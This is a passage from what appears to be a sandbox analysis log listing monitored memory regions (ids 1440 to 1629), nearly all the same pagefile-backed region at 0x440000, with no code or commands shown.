pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1440 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1441 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1442 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1443 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1444 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1445 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1446 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1447 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1448 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1449 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1450 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1451 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1452 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1453 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1454 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1455 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1456 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1457 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1458 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1459 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1460 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1461 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1462 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1463 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1464 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1465 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1466 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1467 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1468 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1469 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1470 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1471 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1472 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1473 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1474 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1475 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1476 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1477 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1478 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1479 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1480 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1481 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1482 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1483 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1484 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1485 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1486 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1487 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1488 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1489 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1490 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1491 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1492 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1493 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1494 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1495 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1496 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1497 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1498 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1499 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1500 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1501 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1502 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1503 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1504 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1505 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1506 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1507 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1508 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1509 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1510 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1511 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1512 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1513 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1514 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1515 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1516 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1517 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1518 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1519 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1520 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1521 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1522 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1523 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1524 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1525 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1526 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1527 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1528 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1529 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1530 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1531 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1532 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1533 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1534 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1535 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1536 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1537 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1538 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1539 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1540 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1541 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1542 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1543 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1544 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1545 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1546 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1547 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1548 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1549 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1550 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1551 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1552 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1553 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1554 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1555 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1556 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1557 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1558 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1559 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1560 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1561 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1562 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1563 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1564 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1565 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1566 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1567 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1568 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1569 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1570 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1571 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1572 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1573 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1574 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1575 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1576 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1577 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1578 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1579 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1580 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1581 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1582 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1583 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1584 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1585 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1586 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1587 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1588 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1589 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1590 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1591 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1592 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1593 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1594 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1595 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1596 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1597 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1598 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1599 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1600 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1601 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1602 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1603 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1604 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1605 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1606 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1607 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1608 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1609 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1610 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1611 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1612 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1613 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1614 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1615 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1616 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1617 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1618 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1619 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1620 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1621 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1622 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1623 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1624 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1625 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1626 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1627 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1628 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1629 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 